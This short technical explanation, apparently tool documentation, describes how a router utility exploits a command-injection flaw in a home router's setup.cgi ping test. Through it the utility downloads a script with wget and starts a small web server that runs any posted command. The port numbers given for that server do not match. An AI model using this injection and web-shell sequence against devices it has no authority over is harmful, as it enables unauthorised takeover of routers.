Sky Router Tool first checks to see if it can access http://192.168.0.1:8234/do_cmd.sh (Which it wont be able to if the router has been restarted since the tool was last run).
If it cant access the page it then runs the following commands using the URL injection hack (http://192.168.0.1/setup.cgi?todo=ping_test&nextfile=diagping.htm&c4_IPAddr=127.0.0.1>/dev/null;...):
mkdir /tmp/new_web | - Makes a new temporary directory |
rm /tmp/new_web/do_cmd.sh | - Removes any old cgi script |
wget -P /tmp/new_web http://computer running sky router tool/do_cmd.sh | - Downloads the cgi script from the sky router tool web interface |
chmod 777 /tmp/new_web/do_cmd.sh | - Adds execute permissons to the script |
ln /etc/htpasswd /tmp/new_web/.htpasswd | - Link to htpasswd file (makes the new web server be username/password protected) |
kill `cat /tmp/mini_httpd.pid` | - Kill any already running http servers created by sky router tool |
mini_httpd -p 8324 -d /tmp/new_web/ -c "**sh" -i /tmp/mini_httpd.pid | - Starts a new web server on port 8324 |
do_cmd.sh is just a simple script which runs any commands which are posted to it (you can find a copy of it in the 'htdocs' folder of the Sky Router Tool installation directory). Sky Router Tool uses this do_cmd.sh to send commands to the router and return responses.